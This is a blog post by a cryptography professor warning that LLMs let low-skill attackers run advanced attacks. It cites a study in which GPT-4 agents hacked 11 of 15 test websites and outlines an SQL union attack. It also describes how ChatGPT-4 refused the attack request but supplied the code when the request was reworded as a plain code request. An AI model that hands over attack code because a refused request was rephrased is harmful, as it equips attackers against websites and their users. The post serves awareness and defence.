The New Cybersecurity Horizon: The Rise Of AI Attackers and AI Script Kiddies

--

We used to have a spectrum of attacks — from script kiddies to an APT (Advanced Persistent Threat) actor. Basically, the script kiddies were easy to thwart as they typically use standard tools and have a relatively low skill level. The APT actor, though, was difficult as they often have a high skill level and are on a mission to achieve a goal.

But what happens when we merge the script kiddie with the APT actor and lower the bar so that the script kiddie has the knowledge and mission of an APT actor? Well, with the rise of AI, we are now facing this threat and where AI turns against us and uses its knowledge to attack us.

With almost exponential rise of AI in the past few years has been highlighted with the jump from ChatGPT 3 to ChatGPT 4, and where the new LLMs (Large Large Models) are able to act in a multimodal way — using video and audio rather than just being focused on interpreting the text.

This article outlines this scenario, and where it defines that an LLM can become a sophisticated attack, and which has a high degree of success in hacking a Website:

The author found that GPT-4 managed to hack over 73% (11 out of the 15 websites) of the target websites (please forgive the typo on ‘assisatant’):

The example the author gives is for an SQL union attack, and which has a number of steps. This is to navigate to a page and then try a default username and password. Next, we need to attempt a GET request with a union SQL command. If we try to ask ChatGPT-4 for this attack, it refuses:

But, ask it to just produce the code required, it gives away the code it can use:

In the end, an attacker would automated the attacks using API calls. If you want to understand these, try here:

https://medium.com/asecuritysite-when-bob-met-alice/is-it-cheaper-to-subscribe-to-chatgpt-and-dalle-3-or-to-use-apis-bfe36e37c391

Conclusion

The AI-driven script kiddies will be bad enough, but think about attackers that have high skill levels — they will be able to automate their attacks and scale up at a vast level.

We need to invest massively in advancing our tools and in skilling up our cybersecurity defenders against the forthcoming on-slaught of AI-generated actors. Once OpenAI releases Sora and Voice, we will be faced with multimodal attacks, and where it will be difficult to tell real from fake. Just like Hal in 2001, AI is driven by a mission and will not stop until the mission is done, and no matter the damage it may do to individuals or organisations:

So, if you are interested in AI and Cybersecurity, and are okay to be scared, please come alone to one of my forthcoming talks:

--

--

Prof Bill Buchanan OBE FRSE
ASecuritySite: When Bob Met Alice

Professor of Cryptography. Serial innovator. Believer in fairness, justice & freedom. Based in Edinburgh. Old World Breaker. New World Creator. Building trust.